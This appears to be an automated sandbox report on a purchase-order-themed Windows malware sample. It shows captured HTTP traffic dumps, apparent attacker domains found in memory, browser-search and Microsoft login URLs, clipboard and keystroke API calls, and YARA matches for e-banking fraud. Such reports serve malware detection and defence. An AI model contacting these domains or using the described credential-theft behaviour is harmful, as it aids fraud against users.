a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:03 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:06 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:08 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:11 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLEcc1cLL1ICigzoYDwASGAgP1R7KckHMuoiluxx1k1kBejQlHb5JuX0vYDADojZfx5zWhPBL0RBqxZf86Pr%2BnAC8nwtp8%2FANO6VMCbJ9s0Z4yISbJqWLz3nONEyZ1MOjXLZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7b9fa90e7290-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv5WW7UKpXlD%2BkuY5mdUWVBDlLL%2FIu3OVU7KT2MEsVo0bySIRz1%2F%2BJebXGhkS7eHtVspHkHivZpQZUf%2BAwSHrvUycTxLjwGvNcstzZBCoIKGlCQP9MWGLPiwRfNhpAThIaW%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bafccea7cee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2m%2Bncc8eGcdlDIJmomxfM4k%2F6WkBYGWB5M9SBzAvpF4WNGSCGo4VGHYGtb9R38cnD1quIsaVfXr35WiJ9ZAbjVTAjkRd0Hp2yMXzs1s3mDMAQ69MNoM36PMrMps%2B%2BiKr9F1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bbfbfa01821-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGp%2Ft1aV%2Bhqq2w7fdEl%2FHfZElDFK20CfwsZ1tcFqO%2BSVUMOKziATmlnZcbtspJ4N1iMUFzadvRbw2C8tJp%2FWyOctwGoteIrMAcNtP6A9wkGBdW7HepNjneLJYmLIrw9ieIP7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bcfab30c47c-EWRalt-svc: h3=":443"; ma=86400 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolut
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:31 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:33 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:36 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:38 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541474602.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mizuquan.top
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541474602.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004412000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000004142000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000003.00000003.2104347363.0000000007A06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004280000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000003FB0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_00307099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00307099
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_00307294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00307294
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_002F4342
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_0031F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0031F5D0

            E-Banking Fraud

            barindex
            Source: Yara match File source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
